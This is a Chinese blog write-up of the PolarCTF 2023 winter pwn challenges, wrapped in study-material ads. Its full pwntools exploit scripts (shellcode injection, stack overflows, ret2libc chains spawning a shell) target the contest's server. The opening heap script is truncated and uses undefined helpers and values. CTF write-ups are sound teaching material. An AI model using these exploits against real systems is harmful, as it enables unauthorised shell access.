PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言

最新推荐文章于 2024-07-20 19:02:24 发布

2401_84558406

最新推荐文章于 2024-07-20 19:02:24 发布

阅读量1k

点赞数 14

分类专栏： 2024年程序员学习文章标签：网络安全 web安全面试

本文链接：https://blog.csdn.net/2401_84558406/article/details/138986456

版权

2024年程序员学习专栏收录该内容

10 篇文章 0 订阅

订阅专栏

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要体系化学习资料的朋友，可以加我V获取：vip204888 （备注网络安全）

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

def Del(Index):
io.recvuntil(‘:’)
io.sendline(‘2’)
io.recvuntil(‘:’)
io.sendline(str(Index))

def Show(Index):
io.recvuntil(‘:’)
io.sendline(‘3’)
io.recvuntil(‘:’)
io.sendline(str(Index))

io.recvuntil(‘like?’)
io.sendline(‘Hello,everyone.’)

min_Size = 0x10 + len(Context) + 1

Add(0x14, ‘polar_ctf’) # chunk 0
Add(0x19, ‘polar_ctf_2023’) # chunk 1

用于POP chunk隔离

Add(0x10, ‘polar’) # chunk 2

todo 思考为什么是先删除0，再删除1

Del(0)
Del(1)

Add(6, p64(magic_addr))
Show(0)

io.interactive()


### 1.2 shellcode1


本题主要考查栈溢出中shellcode写入利用相关知识


##### 程序分析


使用checksec分析，NX保护开启情况未知



![](https://img-blog.csdnimg.cn/img_convert/9e504beff8487851b32bc4e884b542e1.png)


##### 代码解读


程序一开始会进入到如下函数中



![](https://img-blog.csdnimg.cn/img_convert/1725cb8f1c74fbfc7ebe1d4be1393171.png)


通过查看发现，read() 函数中的参数 x 位于 .bss 段



![](https://img-blog.csdnimg.cn/img_convert/fdbfd19a4fb92153daf05d27a9228b55.png)


此外，由于 gets() 函数由于未对输入长度进行限制，存在栈溢出漏洞


那么，我们可以通过 read() 函数将 shellcode 写入 .bss 段中，然后通过栈溢出漏洞覆盖函数返回地址为 .bss 段中我们写入的 shellcode 地址，进而 getshell


##### 脚本编写

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2115)
elf = ELF(‘./shellcode1’)

x_addr = 0x804a080

shellcode = asm(shellcraft.sh())
io.sendlineafter(‘name?’, shellcode)
payload = b’a’ * 0x6c + b’b’ * 4 + p32(x_addr)
io.sendlineafter(‘me:’, payload)
io.interactive()


### 1.3 guess


##### 程序分析



![](https://img-blog.csdnimg.cn/img_convert/4b94fc6963566ad9ae0cb97e035c36b8.png)


##### 代码解读



![](https://img-blog.csdnimg.cn/img_convert/382ea0eb98969840244654676199f9ae.png)


Start()函数中有一个gets()函数，且不对输入长度作限制，存在栈溢出漏洞



![](https://img-blog.csdnimg.cn/img_convert/4cd23dde7b59a4f7f292ce2933d1e07c.png)


在Exports中，可以看到有一个位于.bss段的变量 buf2



![](https://img-blog.csdnimg.cn/img_convert/e4be3016b885f549190bafcdae9d91d8.png)


那么，我们可以将 '/bin/bash' 写入位于.bss段的变量 buf2 中，并将其作为system()函数的参数调用system()函数执行来get shell


##### 脚本编写


我们通过 elf.sym[] 或者 elf.plt[] 来获取 gets system的plt表地址，初步编写脚本如下

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2069)
elf = ELF(‘./guess’)

gets_addr = elf.sym[‘gets’]
system_addr = elf.sym[‘system’]
buf2_addr = 0x804a080

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32() + p32()


由于gets()函数跳过4个字节去寻找参数，那么完善payload如下

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32() + p32(buf2_addr)


将 '/bin/bash' 作为参数传入 buf2 中后，需要继续调用 system() 函数，并将 buf2 中的 '/bin/bash' 作为system() 函数的参数调用，由于 system() 函数也是跳过4个字节去寻找参数，那么进一步完善 payload 如下

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr)


最终，完整脚本如下

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2069)
elf = ELF(‘./guess’)

gets_addr = elf.sym[‘gets’]
system_addr = elf.sym[‘system’]
buf2_addr = 0x804a080

payload = b’a’ * 0x6c + b’b’ * 4 + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr)
io.sendline(payload)
io.sendline(‘/bin/sh’)
io.interactive()



## 中等难度


### 2.1 fate


##### 程序分析


![](https://img-blog.csdnimg.cn/img_convert/8e4e3c94391858d2490a7c0e4b166273.png)


##### 代码解读


本题一开始会进入到如下函数


![](https://img-blog.csdnimg.cn/img_convert/71fe0d83affa57059dfe27b901981737.png)


由于本题直接在 exploit() 函数中给出了 system("/bin/sh")，因此我们直接通过 back() 函数中存在的栈溢出漏洞，覆盖函数返回地址为 exploit() 函数地址即可getshell


![](https://img-blog.csdnimg.cn/img_convert/1905bd1cf2ebcd9edbaa9c7472ab1675.png)


##### 脚本编写

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2101)

exploit_addr = 0x804887c

payload = b’a’ * 0x6c + b’b’ * 4 + p32(exploit_addr)
io.sendlineafter(‘back’, payload)
io.interactive()


### 2.2 look


本题为一道典型的 ret2libc32 题目


##### 程序分析


![](https://img-blog.csdnimg.cn/img_convert/619dfa3013c6c30ca9ca8d4ba34e275e.png)


##### 代码解读


在Start()函数中，read()函数可读入0xc8个字节，但buf大小仅0x6c字节，存在栈溢出漏洞


![](https://img-blog.csdnimg.cn/img_convert/dda409e3eb3a827ace56735cb0a2badd.png)


由于在字串及Exports中均无其他可利用信息，也无其他后门函数，因此本题将通过 ret2libc 获取shell


##### 脚本编写


首先

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2074)
elf = ELF(‘./look’)

write_plt = elf.plt[‘write’]
write_got = elf.got[‘write’]
Start_addr = 0x08048561

payload = b’a’ * 0x6c + b’b’ * 4 + p32(write_plt) + p32(Start_addr) + p32(1) + p32(write_got) + p32(4)

io.sendline(payload)
write_addr = u32(io.recv(4))
success(“write_addr >>> 0x%x” % write_addr)


然后进行在线调试，查看输出情况，发现此时 write\_addr 为 0xf7e964d0


![](https://img-blog.csdnimg.cn/img_convert/1b0085f3eec51e912b2f3a8422cef9f3.png)


前往 [https://libc.blukat.me]( )，根据 write\_addr 来查找相应的 libc


![](https://img-blog.csdnimg.cn/img_convert/c6c029e193f45c9e55f958c79bb73bb9.png)


根据 write 函数在 libc 中的偏移量，可以计算出基址，进而计算出 system、str\_bin\_sh 在 libc 中的地址


利用 system、str\_bin\_sh 在 libc 中的地址编写 payload 进行二次溢出来 get shell，脚本后半段如下

base_addr = write_addr - 0x0d44d0
system_addr = base_addr + 0x03a950
bin_sh_addr = base_addr + 0x15912b

payload = b’a’ * 0x6c + b’b’ * 4 + p32(system_addr) + p32(Start_addr) + p32(bin_sh_addr)

io.sendline(payload)
io.interactive()


最终，完整脚本如下

from pwn import *

context(arch=‘i386’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2074)
elf = ELF(‘./look’)

write_plt = elf.plt[‘write’]
write_got = elf.got[‘write’]
Start_addr = 0x08048561

payload = b’a’ * 0x6c + b’b’ * 4 + p32(write_plt) + p32(Start_addr) + p32(1) + p32(write_got) + p32(4)

io.sendline(payload)
write_addr = u32(io.recv(4))
success(“write_addr >>> 0x%x” % write_addr)

base_addr = write_addr - 0x0d44d0
system_addr = base_addr + 0x03a950
bin_sh_addr = base_addr + 0x15912b

payload = b’a’ * 0x6c + b’b’ * 4 + p32(system_addr) + p32(Start_addr) + p32(bin_sh_addr)

io.sendline(payload)
io.interactive()


### 2.3 easy\_exit


##### 程序分析


![](https://img-blog.csdnimg.cn/img_convert/bd035aceac6db602f12dbd36a78a5616.png)


 （题解待补充）


### 2.4 worker


##### 程序分析


![](https://img-blog.csdnimg.cn/img_convert/3f0e7a5d404a968c1f86c9b16799a2a9.png)


 （题解待补充）



## 困难难度


### 3.1 05ret2libc\_64


这是一道常规的64位程序ret2libc题


##### 代码解读


查看字串，可以发现没有system函数，也没有"/bin/sh"



![](https://img-blog.csdnimg.cn/img_convert/34a5786da224e19e62a7656e521687a4.png)


本题由main函数直接进入 putting() 函数中，很明显在gets函数处存在栈溢出漏洞



![](https://img-blog.csdnimg.cn/img_convert/dd4475084f908b3dd0a2018cb693c247.png)


 由题目名称可知，本题为一道ret2libc，那么按照常规解法求解即可


##### 脚本编写


首先，使用 ROPgadget 查看返回地址，可得 pop\_rdi\_ret = 0x400843，ret\_addr = 0x400581



![](https://img-blog.csdnimg.cn/img_convert/043feaf0d7a059d9fe233a97f66b5b17.png)



同样可以前往 [libc database search]( )，根据 puts\_addr 来查找相应的 libc，调试过程得到 puts\_addr 如下



![](https://img-blog.csdnimg.cn/img_convert/db202543a01a0fcfe3eb6b616ae96d24.png)


通过 libc database 找到system、puts以及str\_bin\_sh在libc中的偏移量，然后根据 puts 函数在 libc 中的偏移量，可以计算出基址，进而计算出 system、str\_bin\_sh 在 libc 中的地址



![](https://img-blog.csdnimg.cn/img_convert/31e9d67c48b0311a4d13167e7578ffd5.png)


整体而言，本题依旧是通过构造二次溢出来getshell，完整脚本如下

from pwn import *

context(arch=‘amd64’, os=‘linux’, log_level=‘debug’)
io = remote(‘120.46.59.242’, 2123)
elf = ELF(‘./05ret2libc_64’)

pop_rdi_ret = 0x400843
ret_addr = 0x400581
puts_plt = elf.plt[‘puts’]
puts_got = elf.got[‘puts’]
main_addr = elf.sym[‘main’]

payload = b’a’ * 0x100 + b’b’ * 8 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter(‘question:\n’, payload)

puts_addr = u64(io.recvuntil(b’\x7f’)[-6:].ljust(8, b’\x00’))
print(‘puts_addr=’, hex(puts_addr))

libc_base = puts_addr - 0x06f6a0
system_addr = libc_base + 0x0453a0
bin_sh_addr = libc_base + 0x18ce57

payload = b’a’ * 0x100 + b’b’ * 8 + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
io.sendlineafter(‘question:\n’, payload)
io.interactive()


### 3.2 easy\_str


（题解待更新）


### 3.3 worker\_note1


（题解待更新）


## 总结





还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！


王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。


对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！


【完整版领取方式在文末！！】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)



**需要体系化学习资料的朋友，可以加我V获取：vip204888 （备注网络安全）**

内容实在太多，不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！


对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学，我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**，大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供：


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**

2401_84558406

关注

14
点赞
踩
11

收藏

觉得还不错? 一键收藏
0
评论
PolarCTF 2023冬季个人挑战赛 WriteUp (pwn部分)_polar ctf 东北话是最好的语言

Del(0)Del(1)Show(0)本题主要考查栈溢出中shellcode写入利用相关知识##### 程序分析使用checksec分析，NX保护开启情况未知!##### 代码解读程序一开始会进入到如下函数中!通过查看发现，read() 函数中的参数 x 位于 .bss 段!此外，由于 gets() 函数由于未对输入长度进行限制，存在栈溢出漏洞。
复制链接

扫一扫